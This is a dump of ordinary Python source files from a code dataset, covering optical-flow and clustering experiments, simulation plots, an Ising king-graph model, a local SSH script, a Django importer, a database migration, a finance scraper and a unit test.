EgomotionFlow()\nmf.length = 8.0\nef.length = 4.0 \n\nplt.ylim([0,height])\nplt.xlim([0,width])\n\n\ndx, dy = ef.get_right_trans(width, height, step)\nmx, my = mf.get_move_down(width, height, 100, 100, 50, 50, step)\nnx, ny = mf.get_move_down(width, height, 210, 200, 20, 20, step)\n\ndx = dx + mx + nx\ndy = dy + my + ny\n\n\nfor i in xrange(dx.shape[0]):\n for j in xrange(dx.shape[1]):\n if dx[i,j] != 0.0 or dy[i,j] != 0.0:\n plt.arrow(i, j, dx[i,j], dy[i,j], head_width=3.0, head_length=0.8, fc='k', ec='k')\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"Simulated optical flow vectors\")\nplt.show(block=False)\n\nplt.figure()\ntf = TrajectoryFlow()\ntraj = tf.create_trajectory(dx,dy,10)\nnp.savetxt('test.out', traj, fmt='%.4f', delimiter=',')\ntraj = np.loadtxt(\"test.out\", dtype=np.float64, delimiter=',')\ntrajcopy = traj.copy()\nresiduals, index = get_fit_error(trajcopy, 1)\nplt.plot(residuals)\nplt.xlabel(\"Trajectory index\")\nplt.ylabel(\"Residual\")\nplt.title(\"Subspace fit residual\")\nplt.show(block=False)\n\n\n\nplt.figure()\nplt.ylim([0,height])\nplt.xlim([0,width])\n#plt.gca().set_color_cycle(['#1B9E77', '#D95F02', '#7570B3', '#E7298A', '#66A61E', '#E6AB02', '#A6761D', '#666666'])\nplt.gca().set_color_cycle(['k', 'k', 'k', 'k', 'k', 'k', 'k','k'])\nfor idx, t in enumerate(traj):\n if idx in index:\n x = t[::2]\n y = t[1::2]\n d = np.vstack((x,y))\n d = d.T\n plt.plot(d[:,0], d[:,1],linewidth=2.0)\nplt.title(\"Trajectories used to define the subspace\")\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.show(block=False)\n\nplt.figure()\nplt.ylim([0,height])\nplt.xlim([0,width])\n\nfor idx,r in enumerate(residuals):\n if r > 0.00002:\n plt.scatter(traj[idx,-4], traj[idx,-3])\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"Outlier points\")\nplt.show()\n","sub_path":"synthetic_flow/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360103206","text":"import simulation\nimport network\nimport power_distribution\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport nodes\nfrom matplotlib import cm\nimport background_visualisation\nimport node_visualisation_interpreters\nimport edge_visualisation_interpreters\nimport visualisation\nhardGenNetwork = network.Network(network.SimpleHardcodedNetworkGenerator())\ncS = simulation.coreSimulation(hardGenNetwork)\ncS.aYearInTheLife()\n\ncon1 = cS.network.consumerAgents[0]\ncon2 = cS.network.consumerAgents[1]\ncon3 = cS.network.consumerAgents[2]\n\nsupplierAgent = cS.network.supplierAgents[0]\n\nsup1 = cS.network.suppliers[0]\nsup2 = cS.network.suppliers[1]\n\n\nnw_final=cS.network\n\nfig, axes = plt.subplots(2,2)\n\n'''\nConsumers: Satisfaction, Power, Social\n'''\n\n\nbg1 = background_visualisation.Background()\n#bg2 = background_visualisation.interpBackground(cmap=cm.Accent)\n#bg2.delunay_data(ranGenNetwork.consumers,'neighbourhood_id')\nni1= node_visualisation_interpreters.node_interpreter(radius=50,node_type=nodes.Supplier,color='red', transparency=0.5)\nni2= node_visualisation_interpreters.node_interpreter(radius=15,node_type=nodes.Distributor,color='purple')\nni3= node_visualisation_interpreters.node_interpreter(radius=25,node_type=nodes.Consumer,color='green')\nni4= node_visualisation_interpreters.node_scale_color('guaranteed_capacity',node_type=nodes.Consumer,radius=40,min_val=0,max_val=6000,cmap=cm.autumn)\nei1 = edge_visualisation_interpreters.edge_interpreter(thickness=3,color='gray')\n\ngrid1 = visualisation.networkPane(nw_final,[ei1],[ni1,ni2,ni3],None,0,0)\ngrid2 = visualisation.historyPane(nw_final,1,0,'consumers','consumer_agent','memSoc')\ngrid3 = visualisation.networkPane(nw_final,[ei1],[ni4],None,1,1)\ngrid4 = visualisation.historyPane(nw_final,0,1,'consumers','consumer_agent','memory')\ngrid5 = visualisation.historyPane(nw_final,0,2,'consumers','consumer_agent','memPow')\ngrid6 = visualisation.historyPane(nw_final,1,2,'consumers','consumer_agent','memPowReq')\ngrid7 = visualisation.historyPane(nw_final,2,2,'consumers','consumer_agent','memPowUsed')\n\nvis= visualisation.Visualisation(grid1,grid2,grid3,grid4,grid5,grid6,grid7)\n\nvis.update()\n","sub_path":"power_grid/TestCases.py","file_name":"TestCases.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582857232","text":"\n#导入GMM包\nfrom sklearn.mixture import GMM\n\ndef load_data(file_name):\n import numpy as np\n f = open(file_name,'r')\n data = f.readlines()\n f.close()\n feature_list = []\n for line in data:\n tmp = line.split('\\t')\n feature_list.append([tmp[0],tmp[1]])\n features = np.array(feature_list)\n print(\"Shape: %s\"%str(features.shape))\n return features\n\nsample=load_data(r'Restaurant_Data_Beijing.txt') \n\n\n#设定GMM包所需参数\ngmm=GMM(n_components=4, covariance_type='tied')\nresult= gmm.fit_predict(sample)\n#获得不同类族的中心坐标值\ncenter=gmm.means_\n\n\ndef result_show(features, labels, centers, K=2):\n from matplotlib import pyplot as plt\n color_list = ['ob','oy','oc','om','or','og','ok','sb','sy','sc','sm','sr','sg']\n x = []\n y = []\n for i in range(K+1):\n x.append([])\n y.append([])\n for i in range(len(features)):\n x[labels[i]].append(features[i,0])\n y[labels[i]].append(features[i,1])\n for j in range(len(centers)):\n x[K].append(centers[j,0])\n y[K].append(centers[j,1])\n for i in range(len(x)):\n plt.plot(x[i],y[i],color_list[i])\n plt.show()\n return\n#调用可视化函数\nresult_show(sample, result, center,4)\n","sub_path":"lab_codes/gmm.py","file_name":"gmm.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"301002132","text":"# Copyright 2019 Jij Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .model import BinaryQuadraticModel\n\nclass KingGraph(BinaryQuadraticModel):\n \"\"\"\n BQM for king graph of HITACHI CMOS Annealer\n Attributes\n ---------\n xrange : list of int\n represents hardware (CMOS) restricts for coordinate. [xmin, xmax]\n yrange : list of int\n represents hardware (CMOS) restricts for coordinate. [ymin, ymax]\n prange : list of int\n represents hardware (CMOS) restricts for the strength of interactions 'p'. [pmin, pmax]\n king_graph : list of list of int\n Annealing cloud Web API format representation of interaction coefficients\n Quadratic term [x1, y1, x2, y2, value]\n Linear term [x1, y1, x1, y1, value]\n \"\"\"\n def __init__(self, machine_type, h=None, J=None, Q=None, king_graph=None, var_type='SPIN'):\n \"\"\"\n The constructor reformat interactions to Web API format (ising king graph),\n and validates that the interaction is in King Graph. \n ----------\n machine_type : int\n choose 'ASIC' or 'FPGA'\n king_graph : list of list\n represents ising or QUBO interaction.\n Each spins are decided by 2-d corrdinate x, y.\n Quadratic term [x1, y1, x2, y2, value]\n Linear term [x1, y1, x1, y1, value]\n \"\"\"\n # set parameter ranges\n self.machine_type = machine_type\n if self.machine_type == \"ASIC\":\n self.xrange = [0, 351+1]\n self.yrange = [0, 175+1]\n self.prange = [-3, 3]\n elif self.machine_type == \"FPGA\":\n self.xrange = [0, 79+1]\n self.yrange = [0, 79+1]\n self.prange = [-127, 127]\n else:\n raise ValueError('machine type should be ASIC or FPGA')\n\n # convert format h, J, Q and initilize BQM\n if king_graph is not None:\n h, J, Q = self._convert_to_BQM_format(king_graph, var_type)\n super().__init__(h=h, J=J, Q=Q, var_type=var_type)\n\n # reformat to ising king graph (which is Web API format)\n if king_graph is not None and var_type == \"SPIN\":\n self._ising_king_graph = king_graph\n elif var_type == \"SPIN\":\n self._ising_king_graph = []\n for index, h in self.linear.items():\n x, y = self._convert_to_xy(index)\n self._ising_king_graph.append([x,y ,x,y, h])\n for (i, j), J in self.quad.items():\n x1, y1 = self._convert_to_xy(i)\n x2, y2 = self._convert_to_xy(j)\n self._ising_king_graph.append([x1, y1, x2, y2, J])\n else:\n ising_int = self.ising_interactions()\n sys_size = len(ising_int)\n self._ising_king_graph = []\n for i in range(sys_size):\n for j in range(i, sys_size):\n if ising_int[i][j] == 0:\n continue\n x1, y1 = self._convert_to_xy(self.indices[i])\n x2, y2 = self._convert_to_xy(self.indices[j])\n self._ising_king_graph.append([x1, y1, x2, y2, ising_int[i][j]])\n\n self._validation_ising_king_graph()\n \n def _convert_to_BQM_format(self, king_graph, var_type):\n h, J, Q = None, None, None\n if var_type == \"SPIN\":\n h, J = {}, {}\n for x1, y1, x2, y2, value in king_graph:\n if (x1, y1) == (x2, y2):\n h[(x1, y1)] = value\n else:\n J[(x1, y1), (x2, y2)] = value\n else: # qubo\n Q = {((x1, y1), (x2, y2)): value for x1, y1, x2, y2, value in king_graph}\n return h, J, Q\n\n def get_ising_king_graph(self):\n return self._ising_king_graph\n \n def king_indices(self):\n if isinstance(self.indices[0], tuple):\n return self.indices\n else:\n return [self.convert_to_xy(i) for i in self.indices]\n \n def _convert_to_xy(self, index):\n if isinstance(index, tuple):\n return index[0], index[1]\n else:\n y = int(index / self.xrange[1])\n return int(index - y * self.xrange[1]), y\n \n def convert_to_index(self, x, y):\n return y * self.xrange[1] + x\n \n def _validation_ising_king_graph(self):\n for xi, yi, xj, yj, p in self._ising_king_graph:\n if yi >= self.yrange[1] or yj >= self.yrange[1]:\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p:{}'\n .format(xi, yi, xj, yj, p))\n if not (xi in [xj, xj-1, xj+1]) or not (yi in [yj, yj-1, yj+1]):\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p:{}'\n .format(xi, yi, xj, yj, p))\n if not (self.prange[0] <= p <= self.prange[1]):\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p: {}'\n .format(xi, yi, xj, yj, p))\n \n \n def convert_ising(self):\n interactions = {(x + y*self.xrange[1], xn + yn*self.xrange[1]): p for x,y, xn, yn, p in self.king_graph}\n return interactions","sub_path":"openjij/model/king_graph.py","file_name":"king_graph.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"59255709","text":"# utf-8\n# exercício 84\n\npessoas = list()\ncadastro = list()\npeso = list()\nnome = list()\nn = m = 0\nwhile True:\n pessoas.append(str(input('Nome: ')))\n pessoas.append(float(input('Peso: ')))\n cadastro.append(pessoas[:])\n pessoas.clear()\n resp = str(input('Deseja continuar [S/N]: ')).upper().strip()[0]\n if resp != 'S':\n break\nprint('-=' * 30)\nfor p in cadastro:\n nome.append(p[0])\n peso.append(p[1])\nprint(f'Ao todo, você cadastrou {len(cadastro)}.')\nprint(f'O maior peso foi de {max(peso):.2f} kg. Peso de ', end='')\nfor x in peso:\n if max(peso) == peso[n]:\n print(nome[n].split(), end=' ')\n n += 1\nprint(f'\\nO menor peso foi de {min(peso):.2f} kg. Peso de ', end='')\nfor y in peso:\n if min(peso) == peso[m]:\n print(nome[m].split(), end=' ')\n m += 1","sub_path":"Ex0084/ex0084.py","file_name":"ex0084.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640579899","text":"from pexpect import pxssh\nimport getpass\ntry:\n s = pxssh.pxssh()\n # hostname = input('hostname:')\n # username = input('username')\n # password = getpass.getpass('password')\n s.login('localhost', 'lxw', 'lxw')\n print(\"login\")\n s.sendline('uptime') # run a command\n s.prompt() # match the prompt\n print(type(s.before.decode())) # print everything before the prompt.\n s.sendline('ls -l')\n s.prompt()\n print(s.before.decode())\n s.sendline('touch abc')\n s.prompt()\n print(s.before.decode())\n s.sendline('df')\n s.prompt()\n print(s.before.decode())\n s.logout()\nexcept pxssh.ExceptionPxssh as e:\n print(\"pxssh failed on login.\")\n print(e)","sub_path":"ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"557037993","text":"from django.core.management.base import BaseCommand, CommandError\nfrom albums.models import Artist, PrimaryGenre, SubGenre, Rating, Album , AlbumSubgenre\n\nimport csv\nimport datetime as dt\n\nclass Command(BaseCommand):\n help = 'Reads in data from the old albums list.'\n\n def handle(self, *args, **options):\n file = \"OldAlbums.csv\"\n with open(file, mode='r', encoding='utf-8') as csvfile:\n csv_reader = csv.DictReader(csvfile, delimiter=',')\n \n all_artists = []\n all_genres = []\n all_subgenres = []\n\n for row in csv_reader:\n all_artists.append(row['Artist'])\n all_genres.append(row['Primary Genre'])\n all_subgenres.append(row['Specific Genre'])\n \n all_subgenres = split_subgenres(list(set(all_subgenres)))\n\n unique_artists = list(set(all_artists))\n unique_genres = list(set(all_genres))\n unique_subgenres = list(set(all_subgenres))\n\n save_objects(unique_artists, Artist)\n save_objects(unique_genres, PrimaryGenre)\n save_objects(unique_subgenres, SubGenre)\n\n clean_up()\n\n with open(file, mode='r', encoding='utf-8') as csvfile:\n csv_reader = csv.DictReader(csvfile, delimiter=',')\n for row in csv_reader:\n print(row)\n artist = Artist.objects.filter(name=row['Artist']).first()\n primary_genre = PrimaryGenre.objects.filter(name=row['Primary Genre']).first()\n album = Album.objects.filter(artist__name=row['Artist'], name=row['Album']).first()\n if not album:\n album = Album.objects.create(\n name = row['Album'],\n artist = artist,\n order = 0,\n chart = 0,\n row = 0,\n date_finished = convert_date(\"1/1/2016\"),\n primary_genre = primary_genre,\n )\n\n if row['Specific Genre']:\n if '/' in row['Specific Genre']: \n subgenres = row['Specific Genre'].split('/')\n if album:\n for genre in subgenres:\n subgenre = SubGenre.objects.filter(name=genre).first()\n if genre and not subgenre:\n subgenre = SubGenre.objects.create(name=genre)\n AlbumSubgenre.objects.create(\n album=album,\n subgenre=subgenre\n )\n else:\n subgenre = row['Specific Genre']\n if album:\n subgenre = SubGenre.objects.filter(name=subgenre).first()\n AlbumSubgenre.objects.create(\n album=album,\n subgenre=subgenre\n )\n album.save()\ndef save_objects(unique_set, model):\n for item in unique_set:\n if item != '':\n if model.objects.filter(name=item).first():\n continue\n else:\n model.objects.create(\n name = item\n )\n\ndef split_subgenres(subgenres):\n for row in subgenres:\n if \"/\" in row:\n new_genres = row.split(\"/\")\n for genre in new_genres:\n subgenres.append(genre)\n while row in subgenres:\n subgenres.remove(row) \n \n return subgenres\n\ndef convert_date(date_str):\n if date_str:\n return dt.datetime.strptime(date_str, '%m/%d/%Y')\n else:\n return None\n\ndef clean_up():\n for obj in SubGenre.objects.filter(name__contains=\"/\"):\n obj.delete()","sub_path":"albums/management/commands/addoldalbums.py","file_name":"addoldalbums.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348224973","text":"import math\nimport numpy as np\npi=math.pi\n\ndef rep_lat_vec( k, l, m ):\n gvec=np.array([ -k+m, k+m, l ])\n return gvec\n\ndef rep_lat_norm( k, l, m):\n gvec=np.array([ -k+m, k+m, l ])\n g=math.sqrt(gvec[0]**2+gvec[1]**2+gvec[2]**2)\n return g\n\n\n\ndef Sklm( k, l, m ):\n return 2*math.cos(pi*(2*m+l)/4.)*(1+math.cos(pi*(k+l+m)))\n\ndef DebyeWaller( k, l, m ):\n g=rep_lat_norm( k, l, m)\n u=0.075e-10 #thermal vibration amplitude\n W=2*pi*pi*u*u*g*g\n return W\n\nalpha=np.array([ 0.1, 0.55, 0.35 ])\nbeta =np.array([ 6.0, 1.2, 0.3 ])\n\ntwopiaTF=0.20681\n\ndef Sum( k, l, m ):\n sum=0\n g=rep_lat_norm( k, l, m )\n for i in range(3):\n sum=alpha[i]/(beta[i]/twopiaTF**2+g**2)\n return sum\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()\naxon=1\nif(axon):\n ax = Axes3D(fig) #make it 3D plot\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n ax.set_xlim(-0.3,0.0)\n ax.set_ylim(-0.0,0.2)\n ax.set_zlim(-0.5,0.0)\nims =[]#array for animation\n\nx=[]\ny=[]\nX=[]\nY=[]\nZ=[]\nsumX=[]\nsumY=[]\nsumZ=[]\nsumnorm=[]\ntempsumX=0\ntempsumY=0\ntempsumZ=0\ngamma=1.53785\nalpha2=-7./9\ngy=math.sqrt(2)\ngz=-7.3\nhnorm=6*math.sqrt(2)\n\n#for num in range(10):\n#for num in range(100):\nfor num in range(50):\n k=num+1\n l=-8*num+7\n m=num\n print(np.array([k,l,m]))\n gvec=rep_lat_vec( k, l, m )\n g=rep_lat_norm( k, l, m )\n print(\"gvec\",end=\" = \")\n print(gvec)\n print(\"g norm\",end=\" = \")\n print(g)\n Vg=math.exp(-DebyeWaller( k, l, m ))*Sklm( k, l, m )*Sum( k, l, m )\n print(\"Vg\",end=\" = \")\n print(Vg)\n x.append(num)\n y.append(Vg)\n\n X.append(Vg*gamma*(num+alpha2)*hnorm)\n Y.append(Vg*gamma*gy)\n Z.append(Vg*gz)\n\n tempsumX+=Vg*gamma*(num+alpha2)*hnorm\n tempsumY+=Vg*gamma*gy\n tempsumZ+=Vg*gz\n \n sumX.append(tempsumX)\n sumY.append(tempsumY)\n sumZ.append(tempsumZ)\n sumnorm.append(math.sqrt(tempsumX**2+tempsumY**2+tempsumZ**2))\n \n #im = plt.plot(x, y, marker=\"o\", color = \"red\", linestyle = \"--\")\n #im =ax.plot(X, Y, Z, marker=\"o\", color = \"red\", linestyle = \"--\")\n im =ax.plot(sumX, sumY, sumZ, marker=\"o\", color = \"red\", linestyle = \"--\")\n #im =ax.quiver(0,0,0,sumX, sumY, sumZ, color = \"red\", length = 1, arrow_length_ratio = 0.1)\n ims.append(im)\n \nani =animation.ArtistAnimation(fig, ims, interval=100)\n#plt.plot(x,sumnorm, marker=\"o\", color = \"red\")\n#plt.plot(x, y, marker=\"o\", color = \"red\", linestyle = \"--\")\nplt.show()\n#ani.save('animate.gif', writer='imagemagick', dpi = 300)\n#ani.save('animate.gif')\n#ani.save('animation.gif', writer='pillow')\n","sub_path":"animation_polarization.py","file_name":"animation_polarization.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"97485715","text":"\"\"\"update models\n\nRevision ID: ed4cdbf2fac4\nRevises: da3f846cc030\nCreate Date: 2020-04-01 18:21:42.131499\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport sqlalchemy_utils\n\n# revision identifiers, used by Alembic.\nrevision = 'ed4cdbf2fac4'\ndown_revision = 'da3f846cc030'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute('CREATE EXTENSION IF NOT EXISTS ltree;')\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('environment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('tags',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('tag_name', sa.String(), nullable=False),\n sa.Column('path', sqlalchemy_utils.types.ltree.LtreeType(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('document',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('document', sa.String(), nullable=False),\n sa.Column('doc_type', postgresql.ENUM('article', 'court_case', 'book', 'magazine', 'link', 'other', name='doc_type'), nullable=False),\n sa.Column('doc_format', postgresql.ENUM('pdf', 'doc', 'xls', 'link', 'other', name='doc_format'), nullable=False),\n sa.Column('created_by', sa.Integer(), nullable=True),\n sa.Column('created_date', sa.DateTime(), nullable=True),\n sa.Column('document_date', sa.Date(), nullable=True),\n sa.ForeignKeyConstraint(['created_by'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('document')\n )\n op.create_index(op.f('ix_document_created_date'), 'document', ['created_date'], unique=False)\n op.create_index(op.f('ix_document_document_date'), 'document', ['document_date'], unique=False)\n op.create_table('user_environment',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('environment_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['environment_id'], ['environment.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('user_id', 'environment_id')\n )\n op.create_table('docs_tags',\n sa.Column('document_id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['document_id'], ['document.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('document_id', 'tag_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('docs_tags')\n op.drop_table('user_environment')\n op.drop_index(op.f('ix_document_document_date'), table_name='document')\n op.drop_index(op.f('ix_document_created_date'), table_name='document')\n op.drop_table('document')\n op.drop_table('tags')\n op.drop_table('environment')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed4cdbf2fac4_update_models.py","file_name":"ed4cdbf2fac4_update_models.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249994992","text":"import os\nimport sys\nimport pandas.io.data as web\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport urllib\nimport numpy as np\nimport pandas as pd\n\ndata_path = r'/home/jeff/Data/Download/finance'\n\ndef GetContent(page, tab):\n link = r'http://finance.yahoo.com/etf/lists/?mod_id=mediaquotesetf&tab=tab%d&rcnt=100&page=%d' % (tab, page)\n in_stream = urllib.urlopen(link)\n m_l = ''\n # Data is in the longest line.\n for l in in_stream.readlines():\n if len(l) > len(m_l): m_l = l\n # Replace special characters for BeautifulSoup.\n return m_l.replace(r'\\n', '\\n').replace(r'\\r','\\n')\\\n .replace(r'\\\"', '\"').replace(r'\\/', '/')\\\n .replace(r'\\\\/', '/')\n\ndef GetTable(page, tab):\n # Due to the ranking, these volumn names in each tab are missed.\n miss_col_name = {1: 'Intra-Day Return',\n 2: r'3-MO Return(NAV)',\n 3: r'Volumn(IntaDay)',\n 4: r'Average Market Cap',\n 5: r'Beta(3-YR)',\n 6: r'Net Assets'}\n\n max_try = 10\n for i in range(0, max_try):\n l = GetContent(page, tab)\n soup = BeautifulSoup(l)\n table = soup.findAll('div', {'class': \"yfi-table-container \"})\n if len(table) == 1: break\n print(r'tab %d, page %d, failed %d time' % (tab, page, i + 1))\n table = table[0]\n rows = table.findAll('tr')\n assert rows > 1\n cols = [c.string for c in rows[0].findAll('th')]\n assert cols > 4\n # add missing column\n cols[4] = miss_col_name[tab]\n data = []\n for r in rows[1:]: data.append([c.string for c in r.findAll('td')])\n result = pd.DataFrame(data = data, columns = cols)\n if tab == 1:\n return result\n else:\n return result[['Ticker'] + cols[4:]]\n\ncolumn_map = {'ETF Name': 'name',\n 'Ticker': 'ticker',\n 'Category': 'category',\n 'Fund Family': 'fund',\n # Return (Mkt)\n u'Intra-Day Return': 'return_1d',\n '3-MO Return': 'return_3m',\n 'YTD Return': 'return_ytd',\n '1-YR Return': 'return_1y',\n '3-YR Return': 'return_3y',\n '5-YR Return': 'return_5y',\n # Return (Nav)\n u'3-MO Return(NAV)': 'return_3m_nav',\n 'YTD Return (NAV)': 'return_ytd_nav',\n '1-YR Return (NAV)': 'return_1y_nav',\n '5-YR Return (NAV)': 'return_5y_nav',\n # Trading/Volumn\n u'Volumn(IntaDay)': 'volumn_1d',\n 'Volume (3-MO Avg)': 'volumn_3m_avg',\n 'Last Trade': 'price',\n '52-Week High': 'high_52w',\n '52-Week Low': 'low_52w',\n # Holdings\n u'Average Market Cap': 'avg_mkt_cap',\n 'Portfolio P/E': 'pe',\n 'Portfolio P/S': 'ps',\n 'Portfolio Price/Cashflow': 'pc',\n 'Portfolio Price/ Book': 'pb',\n 'Earnings Growth Rate (ttm)': 'earning_growth',\n # Risk\n u'Beta(3-YR)': 'b',\n 'Alpha (3-YR)': 'a',\n 'R-Squared (3-YR)': 'r2',\n # Operations\n u'Net Assets': 'asset',\n 'Expense Ratio': 'expense',\n 'Annual Turnover Ratio': 'turnover',\n 'Legal Type': 'type',\n 'Inception Date': 'start_date'}\n\ndef convert_number(x):\n if not type(x) is str: return x\n x = x.replace(',','')\n if x[-1].isdigit(): return float(x)\n t = {'B': 1e9, 'M': 1e6, 'k': 1e3, '%': 1}\n try:\n a = float(x[:-1]) * t[x[-1]]\n return a\n except ValueError:\n print(x)\n \ndef CleanData(data):\n cols = [ 'return_1d', 'return_3m', 'return_ytd', 'return_1y',\\\n 'return_3y', 'return_5y', 'return_3m_nav', 'return_ytd_nav',\\\n 'return_1y_nav', 'return_5y_nav', 'expense', 'turnover',\\\n 'earning_growth', 'asset', 'avg_mkt_cap', 'volumn_1d',\\\n 'volumn_3m_avg', 'high_52w', 'low_52w']\n for c in cols: data[c] = data[c].apply(convert_number)\n\n if 'type' in data.columns: \n data.drop(labels = ['type'], axis = 1, inplace = True)\n\n idx = data['start_date'].apply(lambda x: type(x) is str)\n data.loc[idx, 'start_date'] = data.loc[idx, 'start_date'].apply(lambda x: datetime.strptime(x, '%d-%b-%Y').strftime(r'%Y-%m-%d'))\n\n return data\n\n\ndef GetETFTable(is_new = False):\n f = os.path.join(data_path, 'etf_table.csv')\n if is_new: \n result = {}\n for t in range(1, 7):\n result[t] = pd.concat([GetTable(p, t) for p in range(1, 17)])\n print({t: result[t].shape})\n # clean duplicates.\n result[t].sort(columns = ['Ticker'], inplace = True)\n result[t].drop_duplicates(inplace = True)\n print({t: result[t].shape})\n final = result[1]\n for t in range(2, 7):\n print(final.shape)\n final = final.merge(result[t], how = 'outer', on = ['Ticker'], sort = True)\n final.rename(columns = column_map, inplace = True)\n final.to_csv(f, index = False)\n # Clean Data MUST read from csv\n final = pd.read_csv(f, index_col = None)\n final = CleanData(final)\n return final\n\n\ndef GetTickerData(ticker, startdate, update = False):\n f = os.path.join(data_path, r'%s.csv' % ticker)\n if os.path.isfile(f) and not update: return pd.read_csv(f)\n try:\n data = web.DataReader(name=ticker, data_source='yahoo', start=startdata)\n except IOError:\n print(r'Fail to download %s' % f)\n data.to_csv(f)\n return data\n\n","sub_path":"yahoo.py","file_name":"yahoo.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"642120067","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 1 20:16:11 2021\n\n@author: glenn\n\"\"\"\n\ndef pd_series_date(s):\n return s['Date']\n\n# writes a dictionary of list of pandas Series objects to file\ndef cases2csv(data_dict, folder_name, series_name):\n \n for key in data_dict:\n series = data_dict[key]\n filename = str(key) + '_' + series_name + '.csv'\n filepath = folder_name + filename\n examplePandasSeries = series[0]\n seriesKeys = examplePandasSeries.keys()\n \n with open(filepath, 'w') as f:\n \n for column in seriesKeys:\n f.write(str(column) + ',')\n f.write('\\n')\n \n for step in series:\n for item in step:\n f.write(str(item) + ',')\n f.write('\\n')\n f.write('\\n')\n \n \n \"\"\"\n with open('filex.csv', 'w') as f:\n \n firstkey = list(data_dict.keys())[0]\n examplePandasSeries = data_dict[firstkey][0]\n pandasSeriesKeys = examplePandasSeries.keys()\n \n for key in pandasSeriesKeys:\n f.write(str(key) + ',')\n f.write('\\n')\n \n for key in data_dict:\n series = data_dict[key]\n \n f.write('Region: ' + str(key) + ',\\n')\n for step in series:\n for item in step:\n f.write(str(item) + ',')\n f.write('\\n')\n f.write('\\n')\n \"\"\"\n ","sub_path":"Scripts/Transform_Case_Data/local_module/fcts.py","file_name":"fcts.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"463658879","text":"from __future__ import absolute_import, unicode_literals\n\nimport unittest\n\nfrom draftjs_exporter.command import Command\n\n\nclass TestCommand(unittest.TestCase):\n def setUp(self):\n self.command = Command('abracadabra', 5, 'shazam')\n\n def test_init(self):\n self.assertIsInstance(self.command, Command)\n\n def test_str(self):\n self.assertEqual(str(self.command), '')\n\n def test_lt_true(self):\n self.assertTrue(self.command.__lt__(Command('a', 10, 's')))\n\n def test_lt_false(self):\n self.assertFalse(self.command.__lt__(Command('a', 0, 's')))\n\n def test_key(self):\n self.assertEqual(Command.key(self.command), 5)\n\n def test_grouped_by_index(self):\n grouped = Command.grouped_by_index([\n Command('start_text', 0),\n Command('stop_text', 19),\n Command('start_inline_style', 0, 'ITALIC'),\n Command('stop_inline_style', 4, 'ITALIC'),\n Command('start_inline_style', 9, 'BOLD'),\n Command('stop_inline_style', 12, 'BOLD'),\n 